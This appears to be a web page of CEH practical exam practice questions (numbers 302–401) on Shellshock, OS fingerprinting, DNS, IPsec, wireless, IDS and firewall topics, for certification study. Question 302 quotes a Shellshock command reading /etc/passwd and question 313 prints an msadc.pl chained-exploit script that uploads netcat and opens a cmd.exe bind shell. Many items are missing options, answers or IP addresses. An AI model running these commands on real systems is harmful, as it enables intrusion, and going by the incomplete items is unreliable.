CEH Practical Exam Solutions Part 4/5

MCQ CEH Practical Exam Solutions

302. env x=`(){ :;};echo exploit` bash -c ‘cat /etc/passwd’
What is the Shellshock bash vulnerability attempting to do on an vulnerable Linux host?
Display passwd content to prompt
Changes all passwords in passwd
Removes the passwd file
Add new user to the passwd file

303. Shellshock had the potential for an unauthorized user to gain access to a server. It affected many internet facing services, which OS did it not directly affect?
A. Windows
B. Unix
C. Linux

304. Which of the following is a vulnerability in GNU’s bash shell (discovered in September of 2014) that gives attackers access to run remote commands on a vulnerable system? The malicious software can take control of an infected machine, launch denial-of-service attacks to disrupt websites, and scan for other vulnerable devices (including routers).
A. Shellshock
B. Rootshell
C. Rootshock
D. Shellbash

305. How can telnet be used to fingerprint a web server?
A. telnet webserverAddress 80
B. telnet webserverAddress 80
PUT / HTTP/1.0
C. telnet webserverAddress 80
D. telnet webserverAddress 80
PUT / HTTP/2.0

306. [email protected]_server:~$ nmap -T4 -0
TCP/IP fingerprinting (for OS scan) xxxxxxx xxxxxx xxxxxxxxx. QUITTING!
Obviously, it is not going through. What is the issue here?
A. OS Scan requires root privileges
B. The nmap syntax is wrong.
C. The outgoing TCP/IP fingerprinting is blocked by the host firewall
D. This is a common behavior for a corrupted nmap application

307. What type of OS fingerprinting technique sends specially crafted packets to the remote OS and analyzes the received response?
A. Passive
B. Distributive
C. Reflective
D. Active

308. Which of the following types of jailbreaking allows user-level access but does not allow iboot-level access
Ans: userland exploit

309. An attacker uses a communication channel within an operating system that is neither designed nor intended to transfer information. What is the name of the communications channel?
A. Classified
B. Overt
C. Encrypted
D. Covert

310. One way to defeat a multi-level security solution is to leak data via
A. a bypass regulator.
B. steganography.
C. a covert channel.
D. asymmetric routing.

311. A covert channel is a channel that
A. transfers information over, within a computer system, or network that is outside of the security policy.
B. transfers information over, within a computer system, or network that is within the security policy.
C. transfers information via a communication path within a computer system, or network for transfer of data.
D. transfers information over, within a computer system, or network that is encrypted.

312. An organization hires a tester to do a wireless penetration test. Previous reports indicate that the last test did not contain management or control packets in the submitted traces. Which of the following is the most likely reason for lack of management or control packets?
A. The wireless card was not turned on.
B. The wrong network card drivers were in use by Wireshark.
C. On Linux and Mac OS X, only 802.11 headers are received in promiscuous mode.
D. Certain operating systems and adapters do not collect the management or control packets.

313. A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web server. While it is effective, the tester finds it tedious to perform extended functions. On further research, the tester come across a perl script that runs the following msadc functions:
system(“perl msadc.pl -h $host -C \\”echo open $your >testfile\\””);
system(“perl msadc.pl -h $host -C \\”echo $user>>testfile\\””);
system(“perl msadc.pl -h $host -C \\”echo $pass>>testfile\\””);
system(“perl msadc.pl -h $host -C \\”echo bin>>testfile\\””);
system(“perl msadc.pl -h $host -C \\”echo get nc.exe>>testfile
system(“perl msadc.pl -h $host -C \\”echo get hacked.html>>testfile
(“perl msadc.pl -h $host -C \\”echo quit>>testfile\\””);
system(“perl msadc.pl -h $host -C \\”ftp \\-s\\:testfile\\””);
$o=; print “Opening …\\n”;
system(“perl msadc.pl -h $host -C \\”nc -l -p $port -e cmd.exe\\””);
Which exploit is indicated by this script?
A. A buffer overflow exploit
B. A chained exploit
C. A SQL injection exploit
D. A denial of service exploit

314. How can a rootkit bypass Windows 7 operating system’s kernel mode, code signing policy?

A. Defeating the scanner from detecting any code change at the kernel
B. Replacing patch system calls with its own version that hides the rootkit (attacker’s) actions
C. Performing common services for the application process and replacing real applications with fake ones
D. Attaching itself to the master boot record in a hard drive and changing the machine’s boot sequence/options

315. What mechanism in Windows prevents a user from accidentally executing a potentially malicious batch (.bat) or PowerShell (.ps1) script?
A. User Access Control (UAC)
B. Data Execution Prevention (DEP)
C. Address Space Layout Randomization (ASLR)
D. Windows firewall

316. A network administrator discovers several unknown files in the root directory of his Linux FTP server. One of the files is a tarball, two are shell script files, and the third is a binary file is named “”nc.”” The FTP server’s access logs show that the anonymous user account logged in to the server, uploaded the files, and extracted the contents of the tarball and ran the script using a function provided by the FTP server’s software. The ps command shows that the nc file is running as process, and the netstat command shows the nc process is listening on a network port.
What kind of vulnerability must be present to make this remote attack possible?
File system permissions
Privilege escalation
Brute force login
Directory traversal

317. An attacker with access to the inside network of a small company launches a successful STP manipulation attack. What will he do next?
He will create a SPAN entry on the spoofed root bridge and redirect traffic to his computer.
He will repeat the same attack against all L2 switches of the network.
He will activate OSPF on the spoofed root bridge.
He will repeat this action so that it escalates to a DoS attack.

318. It is a widely used standard for message logging. It permits separation of the software that generates messages, the system that stores them, and the software that reports and analyzes them. This protocol is specifically designed for transporting event messages. Which of the following is being described?


319. Which among the following is a Windows command that a hacker can use to list all the shares to which the current user context has access?

320. Which system consists of a publicly available set of databases that contain domain name registration contact information?

321. During a recent security assessment, you discover the organization has one Domain Name Server (DNS) in a Demilitarized Zone (DMZ) and a second DNS server on the internal network. What is this type of DNS configuration commonly called?
A. Split DNS
D. DNS Scheme

322. A hacker is attempting to use nslookup to query Domain Name Service (DNS). The hacker uses the nslookup interactive mode for the search. Which command should the hacker type into the command shell to request the appropriate records?
A. Locate type=ns
B. Request type=ns
C. Set type=ns
D. Transfer type=ns

323. ___________ Is a set of extensions to DNS that provide to DNS clients (resolvers) origin authentication of DNS data to reduce the threat of DNS poisoning, spoofing, and similar attacks types.
Resource records
Zone transfer
Resource transfer

324. Some clients of TPNQM SA were redirected to a malicious site when they tried to access the TPNQM main site. Bob, a system administrator at TPNQM SA, found that they were victims of DNS Cache Poisoning. What should Bob recommend to deal with such a threat
The use of DNSSEC
Client awareness
The use of double-factor authentication
The use of security agents in clients computers

325. What is the purpose of a demilitarized zone on a network
To provide a place to put the honeypot
To only provide direct access to the nodes within the DMZ and protect the network behind it
To scan all traffic coming through the DMZ to the internal network
To contain the network devices you wish to protect

326. Bob, a system administrator at TPNQM SA, concluded one day that a DMZ is not needed if he properly configures the firewall to allow access just to servers ports, which can have direct internet access, and block the access to workstations. Bob also concluded that DMZ makes sense just when a stateful firewall is available, which is not the case of TPNQM SA.
In this context, what can you say
A. Bob can be right since DMZ does not make sense when combined with stateless firewalls.
B. Bob is totally wrong. DMZ is always relevant when the company has internet servers and workstations.
C. Bob is partially right. DMZ does not make sense when a stateless firewall is available.
D. Bob is partially right. He does not need to separate networks if he can create rules by destination IPs, one by one.

327. A company firewall engineer has configured a new DMZ to allow public systems to be located away from the internal network. The engineer has three security zones set:
Untrust (Internet) – (Remote network =
DMZ (DMZ) – (
Trust (Intranet) – (
The engineer wants to configure remote desktop access from a fixed IP on the remote network to a remote desktop server in the DMZ. Which rule would best fit this requirement?
A. Permit RDP 3389
B. Permit RDP 3389
C. Permit RDP 3389
D. Permit RDP 3389

328. A regional bank hires your company to perform a security assessment on their network after a recent data breach. The attacker was able to steal financial data from the bank by compromising only a single server.
Based on this information, what should be one of your key recommendations to the bank?
Place a front-end web server in a demilitarized zone that only handles external web traffic
Require all employees to change their anti-virus program with a new one.
Issue new certificates to the web servers from the root certificate authority
Move the financial data to another server on the same IP subnet

329. In both pharming and phishing attacks an attacker can create websites that look similar to legitimate sites with the intent of collecting personal identifiable information from its victims. What is the difference between pharming and phishing attacks?
A. Both pharming and phishing attacks are purely technical and are not considered forms of social engineering
B. In a pharming attack a victim is redirected to a fake website by modifying their host configuration file or by exploiting vulnerabilities in DNS. In a phishing attack an attacker provides the victim with a URL that is either misspelled or looks similar to the actual websites domain name
C. Both pharming and phishing attacks are identical
D. In a phishing attack a victim is redirected to a fake website by modifying their host configuration file or by exploiting vulnerabilities in DNS. In a pharming attack an attacker provides the victim with a URL that is either misspelled or looks very similar to the actual websites domain name

330. An attacker has installed a RAT on a host. The attacker wants to ensure that when a user attempts to go to http://www.MyPersonalBank.com, the user is directed to a phishing site.
Which file does the attacker need to modify

331. A security engineer has been asked to deploy a secure remote access solution that will allow employees to connect to the company’s internal network. Which of the following can be implemented to minimize the opportunity for the man-in-the-middle attack to occur?
B. Mutual authentication
C. IPSec
D. Static IP addresses

332. When security and confidentiality of data within the same LAN is of utmost priority, which IPSec mode should you implement?
A. AH Tunnel mode
B. AH promiscuous
C. ESP transport mode
D. ESP confidential

333. Which component of IPsec performs protocol-level functions that are required to encrypt and decrypt the packets?
Ans: Internet Key Exchange (IKE)

334. Internet Protocol Security IPSec is actually a suite of protocols. Each protocol within the suite provides different functionality. Collective IPSec does everything except.
A. Protect the payload and the headers
B. Authenticate
C. Encrypt
D. Work at the Data Link Layer

335. Which protocol is used for setting up secured channels between two devices, typically in VPNs?

336. The use of technologies like IPSec can help guarantee the following: authenticity, integrity, confidentiality and
A. non-repudiation.
B. operability.
C. security.
D. usability.

337. In IPv6 what is the major difference concerning application layer vulnerabilities compared to IPv4?
Vulnerabilities in the application layer are independent of the network layer. Attacks and mitigation techniques are almost identical.
Implementing IPv4 security in a dual-stack network offers protection from IPv6 atttacks too.
Vulnerabilities in the application layer are greatly different from IPv4
Due to the extensive security measures built in IPv6, application layer vulnerabilities need not be addressed

338. Which of these is capable of search for and locating rogue access points?

339. Supposed you are the Chief Network Engineer of a certain Telco. Your company is planning for a big business expansion and it requires that your network authenticate users connecting using analog modems, Digital Subscriber Lines (DSL), wireless data services, and Virtual Private Networks (VPN) over a Frame Relaynetwork. Which AAA protocol would you implement?
C. Kerberos

340. Which of the following security policies defines the use of VPN for gaining access to an internal corporate network?
A. Network security policy
B. Remote access policy
C. Information protection policy
D. Access control policy

341. A security analyst is performing an audit on the network to determine if there are any deviations from the security policies in place. The analyst discovers that a user from the IT department had a dial-out modem installed. Which security policy must the security analyst check to see if dial-out modems are allowed?
A. Acceptable-use policy
B. Firewall-management policy
C. Remote-access policy
D. Permissive policy

342. Which tool would be used to collect wireless packet data?
A. NetStumbler
B. John the Ripper
C. Nessus
D. Netcat

343. Smart cards use which protocol to transfer the certificate in a secure manner?
A. Extensible Authentication Protocol (EAP)
B. Point to Point Protocol (PPP)
C. Point to Point Tunneling Protocol (PPTP)
D. Layer 2 Tunneling Protocol (L2TP)

344. In order to have an anonymous Internet surf, which of the following is best choice?
Use Tor network with multi-node (connect virtual tunnels, not direct connection)
Use SSL sites when entering personal information
Use shared WiFi
Use public VPN

345. Bluetooth uses which digital modulation technique to exchange information between paired devices?
A. PSK (phase-shift keying)
B. FSK (frequency-shift keying)
C. ASK (amplitude-shift keying)
D. QAM (quadrature amplitude modulation)

346. Which of the following Bluetooth hacking techniques does an attacker use to send messages to users without the recipient’s consent, similar to email spamming

347. The following are types of Bluetooth attack EXCEPT_____?
A. Bluejacking (sends spam in the form of text messages to the devices)
B. Bluebugging (complete takeover of a phone)
C. Bluesnarfing (leave open some of the private information, unlikely to happen)
D. Bluedriving (Wardriving, lookup services)

348. It is a short-range wireless communication technology that allows mobile phones, computers and other devices to connect and communicate. This technology intends to replace cables connecting portable devices with high regards to security.
A. Bluetooth
B. Radio-Frequency Identification
D. InfraRed

349. Which of the following is a wireless network detector that is commonly found on Linux?
A. Kismet
B. Abel
C. Netstumbler
D. Nessus

350. Which of the following is a passive wireless packet analyzer that works on Linux-based systems?
A. Burp Suite
B. OpenVAS
C. tshark
D. Kismet

351. Which of the following network attacks relies on sending an abnormally large packet size that exceeds TCP/IP specifications?
A. Ping of death
B. SYN flooding
C. TCP hijacking
D. Smurf attack

352. Which of the following network attacks takes advantage of weaknesses in the fragment reassembly functionality of the TCP/IP protocol stack?
A. Teardrop
B. SYN flood
C. Smurf attack
D. Ping of death

353. A new wireless client that is 802.11 compliant cannot connect to a wireless network given that the client can see the network and it has compatible hardware and software installed. Upon further tests and investigation it was found out that the Wireless Access Point (WAP) was not responding to the association requests being sent by the wireless client. What MOST likely is the issue on this scenario?
A. The client cannot see the SSID of the wireless network
B. The WAP does not recognize the client’s MAC address.
C. The wireless client is not configured to use DHCP.
D. Client is configured for the wrong channel

354. WPA2 uses AES for wireless data encryption at which of the following encryption levels?
A. 64 bit and CCMP
B. 128 bit and CRC
C. 128 bit and CCMP
D. 128 bit and TKIP

355. During a wireless penetration test, a tester detects an access point using WPA2 encryption. Which of the following attacks should be used to obtain the key?
A. The tester must capture the WPA2 authentication handshake and then crack it.
B. The tester must use the tool inSSIDer to crack it using the ESSID of the network.
C. The tester cannot crack WPA2 because it is in full compliance with the IEEE 802.11i standard.
D. The tester must change the MAC address of the wireless network card and then use the AirTraf tool to obtain the key.

356. Which of the following BEST describes how Address Resolution Protocol (ARP) works?
A. It sends a reply packet for a specific IP, asking for the MAC address
B. It sends a reply packet to all the network elements, asking for the MAC address from a specific IP
C. It sends a request packet to all the network elements, asking for the domain name from a specific IP
D. It sends a request packet to all the network elements, asking for the MAC address from a specific IP

357. You’ve just discovered a server that is currently active within the same network with the machine you recently compromised. You ping it but it did not respond. What could be the case?
A. TCP/IP doesn’t support ICMP
B. ARP is disabled on the target server
C. ICMP could be disabled on the target server
D. You need to run the ping command with root privileges

358. …….. is an attack type for a rogue Wi-Fi access point that appears to be a legitimate one offered on the premises, but actually has been set up to eavesdrop on wireless communications. It is the wireless version of the phishing scam. An attacker fools wireless users into connecting a laptop or mobile phone to a tainted hotspot by posing as a legitimate provider. This type of attack may be used to steal the passwords of unsuspecting users by either snooping the communication link or by phishing, which involves setting up a
fraudulent web site and luring people there. Fill in the blank with appropriate choice.
A. Collision Attack
B. Evil Twin Attack
C. Sinkhole Attack
D. Signal Jamming Attack

359. This tool is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the PTW attack, thus making the attack much faster compared to other WEP cracking tools.
Which of the following tools is being described?
A. Aircrack-ng
B. Airguard
C. WLAN-crack
D. wificracker

360. Which type of antenna is used in wireless communication?
A. Omnidirectional
B. Parabolic
C. Uni-directional
D. Bi-directional

361. Which of the following antennas is commonly used in communications for a frequency band of 10 MHz to VHF and UHF
Ans: Yagi

362. In 2007, this wireless security algorithm was rendered useless by capturing packets and discovering the passkey in a matter of seconds. This security flaw led to a network invasion of TJ Maxx and data theft through a technique known as wardriving. Which algorithm is this referring to?
Wi-Fi Protected Access 2 (WPA2)
Wired Equivalent Privacy (WEP)
Wi-Fi Protected Access (WPA)
Temporal Key Integrity Protocol (TKIP)

363. A technician is resolving an issue where a computer is unable to connect to the Internet using a wireless access point. The computer is able to transfer files locally to other machines, but cannot successfully reach the Internet. When the technician examines the IP address and default gateway they are both on the Which of the following has occurred?
The computer is not using a private IP address
The gateway and the computer are not on the same network
The computer is using an invalid IP address
The gateway is not routing to a public IP address

364. Which of the following descriptions is true about a static NAT?
A. A static NAT uses a many-to-many mapping.
B. A static NAT uses a one-to-many mapping.
C. A static NAT uses a many-to-one mapping.
D. A static NAT uses a one-to-one mapping.

365. A penetration tester is attempting to scan an internal corporate network from the internet without alerting the border sensor. Which is the most efficient technique should the tester consider using?
A. Spoofing an IP address
B. Tunneling scan over SSH
C. Tunneling over high port numbers
D. Scanning using fragmented IP packets

366. DNS cache snooping is a process of determining if the specified resource address is present in the DNS cache records. It may be useful during the examination of the network to determine what software update resources are used, thus discovering what software is installed. What command is used to determine if the entry is present in DNS cache?
Ans: nslookup -norecursive update.antivirus.com

367. An attacker is trying to redirect the traffic of a small office. That office is using their own mail server, DNS server and NTP server because of the importance of their job. The attacker gain access to the DNS server and redirect the direction http://www.google.com to his own IP address. Now when the employees of the office wants to go to Google they are being redirected to the attacker machine. What is the name of this kind of attack?
DNS spoofing (corrupted DNS data is introduced in cache, returning incorrect IP)
Smurf Attack (DDoS, send large spoofed network packet directed towards victim IP)
ARP Poisoning (Send ARP packet to change pairings in its IP to MAC address table)
MAC Flooding (Flooding network switches with packets, to consume the limited)

368. From the following table, identify the wrong answer in terms of Range (ft).
Standard Range (ft)
802.11a 150-150
802.11b 150-150
802.11g 150-150
802.16 (WiMax) 30 miles

369. A large company intends to use Blackberry for corporate mobile phones and a security analyst is assigned to evaluate the possible threats. The analyst will use the Blackjacking attack method to demonstrate how an attacker could circumvent perimeter defenses and gain access to the Prometric Online Testing – Reports https://ibt1.prometric.com/users/custom/report_queue/rq_str… corporate network. What tool should the analyst use to perform a Blackjacking attack?
A. BBCrack
B. Paros Proxy
C. Blooover
D. BBProxy

370. What is a successful method for protecting a router from potential smurf attacks?
A. Placing the router in broadcast mode
B. Enabling port forwarding on the router
C. Installing the router outside of the network’s firewall
D. Disabling the router from accepting broadcast ping messages

371. The security administrator of ABC needs to permit Internet traffic in the host and UDP traffic in the host Also he needs to permit all FTP traffic to the rest of the network and deny all other traffic. After he applied his ACL configuration in the router nobody can access to the ftp and the permitted hosts cannot access to the Internet. According to the next configuration what is happening in the network?
access-list 102 deny tcp any any
access-list 104 permit udp host any
access-list 110 permit tcp host eq www any
access-list 108 permit tcp any eq ftp any
A. The ACL 110 needs to be changed to port 80
B. The ACL for FTP must be before the ACL 110
C. The first ACL is denying all TCP traffic and the other ACLs are being ignored by the router
D. The ACL 104 needs to be first because is UDP

372. A recent security audit revealed that there were indeed several occasions that the company’s network was breached. After investigating, you discover that your IDS is not configured properly and therefore is unable to trigger alarms when needed. What type of alert is the IDS giving?
A. True Positive
B. False Negative
C. False Positive
D. False Positive

373. When analyzing the IDS logs, the system administrator noticed an alert was logged when the external router was accessed from the administrator’s Computer to update the router configuration. What type of an alert is this?
True positive
True negative
False positive
False negative

374. A network administrator received an administrative alert at 3:00 a.m. from the intrusion detection system. The alert was generated because a large number of packets were coming into the network over ports 20 and 21.
During analysis, there were no signs of attack on the FTP servers. How should the administrator classify this situation?
A. True negatives
B. False negatives
C. True positives
D. False positives

375. When tuning security alerts, what is the best approach?
Decrease False negatives
Decrease the false positives
Tune to avoid False positives and False Negatives
Rise False positives Rise False Negatives

376. Sam is working as a pen-tester in an organization in Houston. He performs penetration testing on IDS in order to find the different ways an attacker uses to evade the IDS. Sam sends a large amount of packets to the target IDS that generates alerts, which enable Sam to hide the real traffic. What type of method is Sam using to evade IDS?
Ans: False Positive Generation

377. Which type of intrusion detection system can monitor and alert on attacks, but cannot stop them?
A. Detective
B. Passive
C. Intuitive
D. Reactive

378. Which of the following options represents a conceptual characteristic of an anomaly-based IDS over a signature-based IDS?
Can identify unknown attacks

379. Which of the following does proper basic configuration of snort as a network intrusion detection system require?
A. Limit the packets captured to the snort configuration file.
B. Capture every packet on the network segment.
C. Limit the packets captured to a single segment.
D. Limit the packets captured to the /var/log/snort directory.

380. Which one of the following approaches is commonly used to automatically detect host intrusions?
Network traffic analysis
The host’s network interface use
File checksums
System CPU utilization (anything that widely deviates from the norm)

381. Which solution can be used to emulate computer services, such as mail and ftp, and to capture information related to logins or actions?
A. Firewall
B. Honeypot
C. Core server
D. Layer 4 switch

382. To maintain compliance with regulatory requirements, a security audit of the systems on a network must be performed to determine their compliance with security policies. Which of the following tools would MOST LIKELY be used to perform security audit on various of forms of network systems?
A. Intrusion Detection System
B. Vulnerability scanner
C. Port scanner
D. Protocol analyzer

383. Bob finished a C programming course and created a small C application to monitor the network traffic and produce alerts when any origin sends many IP packets, based on the average number of packets sent by all origins and using some thresholds.
In concept, the solution developed by Bob is actually
A behavior-based IDS
A signature-based IDS
Just a network monitoring tool
A hybrid IDS

384. Which of the statements concerning proxy firewalls is correct?
A. Proxy firewalls increase the speed and functionality of a network.
B. Firewall proxy servers decentralize all activity for an application.
C. Proxy firewalls block network packets from passing to and from a protected network.
D. Computers establish a connection with a proxy firewall which initiates a new network connection for the client.

385. Which of the following types of firewall inspects only header information in network traffic?
A. Packet filter
B. Stateful inspection
C. Circuit-level gateway
D. Application-level gateway

386. Which statement is TRUE regarding network firewalls preventing Web Application attacks?
A. Network firewalls can prevent attacks because they can detect malicious HTTP traffic.
B. Network firewalls cannot prevent attacks because ports 80 and 443 must be opened.
C. Network firewalls can prevent attacks if they are properly configured.
D. Network firewalls cannot prevent attacks because they are too complex to configure.

387. A pentester gains access to a Windows application server and needs to determine the settings of the built-in Windows firewall. Which command would be used?
A. Netsh firewall show config
B. WMIC firewall show config
C. Net firewall show config
D. Ipconfig firewall show config

388. A possibly malicious sequence of packets that were sent to a web server has been captured by an Intrusion Detection System (IDS) and was saved to a PCAP file. As a network administrator, you need to determine whether these packets are indeed malicious. What tool are you going to use to determine if these packets are genuinely malicious or simply a false positive?
A. Intrusion Prevention System (IPS)
B. Vulnerability scanner
C. Protocol analyzer
D. Network sniffer

389. Which type of access control is used on a router or firewall to limit network activity?
A. Mandatory
B. Discretionary
C. Rule-based
D. Role-based

390. Which Intrusion Detection System is best applicable for large environments where critical assets on the network need extra security and is ideal for observing sensitive network segments?

A. Network-based intrusion detection system (NIDS)
B. Host-based intrusion detection system (HIDS)
C. Firewalls
D. Honeypots

391. The security concept of “separation of duties” is most similar to the operation of which type of security device?
A. Firewall
B. Bastion host
C. Intrusion Detection System
D. Honeypot

392. A penetration test was done at a company. After the test, a report was written and given to the company’s IT authorities. A section from the report is shown below:
• Access List should be written between VLANs.
• Port security should be enabled for the intranet.
• A security solution which filters data packets should be set between intranet (LAN) and DMZ.
• A WAF should be used in front of the web applications.
According to the section from the report, which of the following choice is true?
A stateful firewall can be used between intranet (LAN) and DMZ.
MAC Spoof attacks cannot be performed.
There is access control policy between VLANs.
Possibility of SQL Injection attack is eliminated.

393. Employees in a company are no longer able to access Internet web sites on their computers. The network administrator is able to successfully ping IP address of web servers on the Internet and is able to open web sites by using an IP address in place of the URL. The administrator runs the nslookup command for http://www.eccouncil.org and receives an error message stating there is no response from the server. What should the administrator do next?

A. Configure the firewall to allow traffic on TCP ports 53 and UDP port 53.
B. Configure the firewall to allow traffic on TCP ports 80 and UDP port 443.
C. Configure the firewall to allow traffic on TCP port 53.
D. Configure the firewall to allow traffic on TCP port 8080.

394. Which of the following is a hardware requirement that either an IDS/IPS system or a proxy server must have in order to properly function?
A. Fast processor to help with network traffic analysis
B. They must be dual-homed
C. Similar RAM requirements
D. Fast network interface cards

395. Bob, a network administrator at BigUniversity, realized that some students are connecting their notebooks in the wired network to have Internet access. In the university campus, there are many Ethernet ports available for professors and authorized visitors but not for students. He identified this when the IDS alerted for malware activities in the network. What should Bob do to avoid this problem?
Ask students to use the wireless network
Use the 802.1x protocol
Separate students in a different VLAN
Disable unused ports in the switches

396. While conducting a penetration test, the tester determines that there is a firewall between the tester’s machine and the target machine. The firewall is only monitoring TCP handshaking of packets at the session layer of the OSI model. Which type of firewall is the tester trying to traverse?
A. Packet filtering firewall
B. Application-level firewall
C. Circuit-level gateway firewall
D. Stateful multilayer inspection firewall

397. A circuit level gateway works at which of the following layers of the OSI Model?
A. Layer 5 – Application
B. Layer 4 – TCP
C. Layer 3 – Internet protocol
D. Layer 2 – Data link

398. In the OSI model, where does PPTP encryption take place?
A. Transport layer
B. Application layer
C. Data link layer
D. Network layer

399. Which of the following types of firewalls ensures that the packets are part of the established session?
A. Stateful inspection firewall (distinguish legitimate packets for different connections)
B. Circuit-level firewall (monitor TCP handshaking)
C. Application-level firewall (controls input/output)
D. Switch-level firewall

400. You are the Systems Administrator for a large corporate organization. You need to monitor all network traffic on your local network for suspicious activities and receive notifications when an attack is occurring. Which tool would allow you to accomplish this goal?
A. Network-based IDS
B. Firewall
C. Proxy
D. Host-based IDS

401. An incident investigator asks to receive a copy of the event logs from all firewalls, proxy servers, and Intrusion Detection Systems (IDS) on the network of an organization that has experienced a possible breach of security. When the investigator attempts to correlate the information in all of the logs, the sequence of many of the logged events do not match up.
What is the most likely cause?
The security breach was a false positive.
The attacker altered or erased events from the logs.
The network devices are not all synchronized.
Proper chain of custody was not observed while collecting the logs.

Leave a Comment

eighteen − eight =